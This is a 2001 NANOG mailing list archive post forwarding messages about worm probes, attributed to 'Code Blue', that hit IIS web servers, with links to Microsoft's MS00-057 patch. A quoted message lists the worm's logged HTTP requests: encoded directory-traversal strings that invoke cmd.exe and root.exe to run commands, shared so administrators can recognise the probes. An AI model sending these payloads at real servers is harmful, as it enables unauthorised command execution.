Home page logo
/

nanog logo nanog mailing list archives

FW: Re: Worm probes
From: Roeland Meyer <rmeyer () mhsc com>
Date: Tue, 18 Sep 2001 09:13:58 -0700



|> -----Original Message-----
|> From: Jaco Engelbrecht [mailto:bje () serendipity org za]
|> Sent: Tuesday, September 18, 2001 9:01 AM
|> To: Roeland Meyer
|> Subject: Re: Worm probes 
|> 
|> 
|> Hi,
|> 
|> Sorry for emailling you directly, but I can't post to the nanog list.
|> It's `Code Blue` that's going around atm.
|> 
|> Will bounce you a seperate message now.
|> 
|> Regards,
|> Jaco
|>
|> -----Original Message-----
Received: from serendipity.org.za ([196.14.22.14]) by condor.mhsc.com with
SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
        id SBLN3KQ6; Tue, 18 Sep 2001 09:02:18 -0700
Received: from nobody by serendipity.org.za with scanned_ok (Exim 3.22 #6)
        id 15jNJQ-0003O1-00
        for rmeyer () mhsc com; Tue, 18 Sep 2001 18:01:28 +0200
Received: from etna.serendipity.org.za ([196.14.22.132] helo=etna)
        by serendipity.org.za with smtp (Exim 3.22 #6)
        id 15jNJP-0003Ns-00
        for rmeyer () mhsc com; Tue, 18 Sep 2001 18:01:27 +0200
Message-ID: <03e301c1405b$b728cab0$84160ec4 () serendipity org za>
From: "Jaco Engelbrecht" <bje () serendipity org za>
To: "Roeland Meyer" <rmeyer () mhsc com>
Subject: Fw: [hamster () vom tm: Re: New worm going 'round?] (fwd)
Date: Tue, 18 Sep 2001 18:05:18 +0200
MIME-Version: 1.0
Content-Type: text/plain;
        charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-Checked: This message has been scanned for any virusses and unauthorized
attachments.
X-iScan: Version $Id: iScan,v 1.35 2001/03/04 20:15:54 rip Exp $

|> From: Jaco Engelbrecht [mailto:bje () serendipity org za]
|> Sent: Tuesday, September 18, 2001 9:05 AM
|> To: Roeland Meyer
|> Subject: Fw: [hamster () vom tm: Re: New worm going 'round?] (fwd)
|> Importance: High
|> 
|> 
|> Hi Roland,
|> 
|> `Code Blue` - see
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fsection%3Dex
ploit%26vid%3D1806
|> 
|> And for the the solution:
|> "The patch released with the advisory MS00-057
|> (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)
|> eliminates this vulnerability, therefore those who have already
|> applied this patch do not have to take any further action. Otherwise,
|> the patch is available
|> at the following locations:
|> 
|> IIS 4.0
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
|> IIS 5.0
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp";
|> 
|> Regards,
|> Jaco
|> 
|> --
|> bje () serendipity org za
|> the faculty of making fortunate discoveries
|> 
|> ----- Forwarded message from The Flying Hamster 
|> <hamster () vom tm> -----
|> 
|> Date: Tue, 18 Sep 2001 15:36:20 +0100
|> From: The Flying Hamster <hamster () vom tm>
|> To: list () inet-access net
|> Subject: Re: New worm going 'round?
|> Reply-To: list () inet-access net
|> 
|> On Tue, Sep 18, 2001 at 10:31:59AM -0400, Gerald T. Freymann wrote:
|> > If I tail -f httpd-error.log these errors are going by 
|> faster than I
|> can
|> > read! omg!
|> 
|> Same here, the signature requests appear to be
|> 
|> GET /MSADC/root.exe?/c+dir HTTP/1.0
|> GET
|> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
|> HTTP/1.0
|> GET /_vti_bin/..%255c../..%25
|> GET
|> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
|> HTTP/1.0
|> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET
|> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c
|> 1%1c../wi
|> nnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|> GET /scripts/root.exe?/c+dir HTTP/1.0
|> 
|> It looks like each of these are tried against each IP being probed.
|> 
|> --
|> The Flying Hamster <hamster () suespammers org>
|> http://hamster.wibble.org/
|> "Unarmed...and extremely attractive." -- Dana Scully on Windows 95
|> -
|> Recent archives of the list can be found at:
|> http://mix.twistedpair.ca/pipermail/inet-access/
|> Send 'unsubscribe' in the body to 'list-request () inet-access net' to
|> leave.
|> Eat sushi frequently.   inet () inet-access net is the human contact
|> address.
|> 
|> ----- End forwarded message -----
|> 
|> 
|> 
|> 


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault